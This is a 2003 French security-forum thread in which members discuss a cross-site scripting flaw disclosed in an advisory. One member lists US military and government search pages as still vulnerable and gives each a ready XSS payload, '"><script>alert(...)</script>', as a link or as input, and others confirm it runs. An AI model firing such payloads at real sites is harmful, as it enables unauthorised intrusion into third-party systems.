Forum sur la sécurité des réseaux, la configuration des firewalls, la mise en place de protections contre les attaques, de DMZ, de systèmes anti-intrusion ...
Modérateur: modos Ixus
par Nocte » 08 Avr 2003 10:09
Voici mon advisory paru sur mon site (
http://dealerhacksecurity.free.fr) et publié sur <!-- BBCode auto-link start --><a href="http://www.security-corporation.com/index.php?id=articles&a=20030404-002." target="_blank">http://www.security-corporation.com/index.php?id=articles&a=20030404-002.</a><!-- BBCode auto-link end -->
<BR>
<BR>Imaginez-vous! Une faille si basique touchée par un si grand nombre...
-
Nocte
- Matelot
-
- Messages: 5
- Inscrit le: 08 Avr 2003 00:00
-
par DgSe95 » 10 Avr 2003 02:19
halucinant !!!
<BR>
<BR>y a rien a dire, de plus c'es toujours pas patché ! <IMG SRC="images/smiles/icon_eek.gif"> <IMG SRC="images/smiles/icon_eek.gif">
<BR>
<BR>enfin à part les sites militaire qui apparement ne sont plus accecible :
<BR>
<BR> - PENTAGONE : <!-- BBCode auto-link start --><a href="http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=dl.hts&ResultTemplate=dl_default.hts&query=%22%3E%3Cscript%3Ealert%28%27Nocte%27%29%3C%2Fscript%3E" target="_blank">http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=dl.hts&ResultTemplate=dl_default.hts&query=%22%3E%3Cscript%3Ealert%28%27Nocte%27%29%3C%2Fscript%3E</a><!-- BBCode auto-link end -->
<BR>
<BR>- US AIR FORCE:http://www.af.mil/search/
<BR>and write in search field :"><script>alert('CSS by Nocte')</script>
<BR>
<BR>- US ARMY : <!-- BBCode auto-link start --><a href="http://www.lre.usace.army.mil/index.cfm?ChnName=Search" target="_blank">http://www.lre.usace.army.mil/index.cfm?ChnName=Search</a><!-- BBCode auto-link end -->
<BR>and write in search field :"><script>alert('Nocte')</script>
<BR>
<BR>- The official site of The joint Chiefs of Staff : <!-- BBCode auto-link start --><a href="http://www.dtic.mil/jcs/" target="_blank">http://www.dtic.mil/jcs/</a><!-- BBCode auto-link end -->
<BR>and write in search field : "><script>alert('Nocte')</script>
<BR>
<BR>- Defense Intelligence Agency : <!-- BBCode auto-link start --><a href="http://www.dia.mil/search" target="_blank">http://www.dia.mil/search</a><!-- BBCode auto-link end -->
<BR>and write in search field : <script>alert('Nocte')</script>
<BR>
<BR>_________________
<BR>DgSe95 vous salut
<BR>
<BR><font size=-2></font><BR><BR><font size=-2></font>
DgSe95 est de retour
-
DgSe95
- Vice-Amiral
-
- Messages: 666
- Inscrit le: 03 Mars 2003 01:00
- Localisation: Genève, Suisse
-
par DgSe95 » 10 Avr 2003 13:49
test css sur ixus
<BR>
<BR><!-- BBCode auto-link start --><a href="http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=dl.hts&ResultTemplate=dl_default.hts&query=%22%3E%3Cscript%3Ealert%28%27Nocte%27%29%3C%2Fscript%3E" target="_blank">http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=dl.hts&ResultTemplate=dl_default.hts&query=%22%3E%3Cscript%3Ealert%28%27Nocte%27%29%3C%2Fscript%3E</a><!-- BBCode auto-link end -->
<BR>
<BR> <IMG SRC="images/smiles/icon_eek.gif">
DgSe95 est de retour
-
DgSe95
- Vice-Amiral
-
- Messages: 666
- Inscrit le: 03 Mars 2003 01:00
- Localisation: Genève, Suisse
-
par Vinzstyle » 10 Avr 2003 13:53
Je vois pas ce que ça fait. Chez moi ça ouvre une fenetre avec écrit Nocte.
-
Vinzstyle
- Amiral
-
- Messages: 1150
- Inscrit le: 25 Jan 2003 01:00
- Localisation: Les Lilas (93)
par DgSe95 » 10 Avr 2003 14:04
aïe vinsz ! tu veux dire que ça le fait sous ixus ou sur les liens que j'ai mis ???
<BR>
<BR>tu as une fenetre qui s'ouvre c'est normal... c'est la faille de css, mais c'est simplement un exploit basique que tu vois, car si la fenetre s'ouvre cela veux dire que peut générer des commande beaucoup plus dangereuse....
<BR>
<BR>nocte c'est l'auteur de la découverte de la faille
DgSe95 est de retour
-
DgSe95
- Vice-Amiral
-
- Messages: 666
- Inscrit le: 03 Mars 2003 01:00
- Localisation: Genève, Suisse
-
par Vinzstyle » 10 Avr 2003 14:06
Sur IXUS je en sis pas, mais sur les liens que tu as mit (sites du gouvernement américain) ça le fait.
-
Vinzstyle
- Amiral
-
- Messages: 1150
- Inscrit le: 25 Jan 2003 01:00
- Localisation: Les Lilas (93)
par DgSe95 » 10 Avr 2003 14:20
ok pour ixus, tu me rassure, c'est que bruno à bien corriger quand je l'ai informer
<BR>
<BR>pour les site américain, et bien c'est qu'ils sont vulnérable....
DgSe95 est de retour
-
DgSe95
- Vice-Amiral
-
- Messages: 666
- Inscrit le: 03 Mars 2003 01:00
- Localisation: Genève, Suisse
-
par Nocte » 15 Avr 2003 10:10
lol
-
Nocte
- Matelot
-
- Messages: 5
- Inscrit le: 08 Avr 2003 00:00
-
Retour vers Sécurité et réseaux
Utilisateur(s) parcourant actuellement ce forum : Google [Bot] et 1 invité